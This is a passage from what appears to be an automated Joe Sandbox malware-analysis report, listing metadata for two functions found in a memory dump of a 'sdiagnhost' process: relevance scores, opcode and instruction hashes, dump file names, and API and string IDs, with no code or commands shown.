                                                                                                        • Instruction ID: ba10335f030370f1b9a41d9f0e87f07a2d7583508f38a9bbdad3045080b7f230
                                                                                                        • Opcode Fuzzy Hash: ebb20bdf5bbc35091bf985f1be91dde05042e6dc83ad6386c5a15d50d8b31589
                                                                                                        • Instruction Fuzzy Hash: 7E316676A002199FDF60DE39CD50BAF77E8FB44614F84459AE849E3201EF70BA448B61
                                                                                                        Function 04417D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 8db3acc0b42c0387ede826d9ad334f24cacc985f258fdd7e04b1e974c334995d
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: 3D917071E4021A9BEF24DF69C881ABFB7E5AF44720F64451BE855E73E0E730A9418B60
                                                                                                        Function 043D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 8d8befcec7b5514fdef3976c644228172f3c251bca55a60f6c5627322a024605
                                                                                                        • Instruction ID: 5efc460e51c047bf8f859fafaaf51ce2c4b02b3e2201171f1be082e04d2a5d9c
                                                                                                        • Opcode Fuzzy Hash: 8d8befcec7b5514fdef3976c644228172f3c251bca55a60f6c5627322a024605
                                                                                                        • Instruction Fuzzy Hash: A6810CB2D012699BDB359F54CC45BEAB6B4AF08714F0441DAA919B7280E7706E85CFA0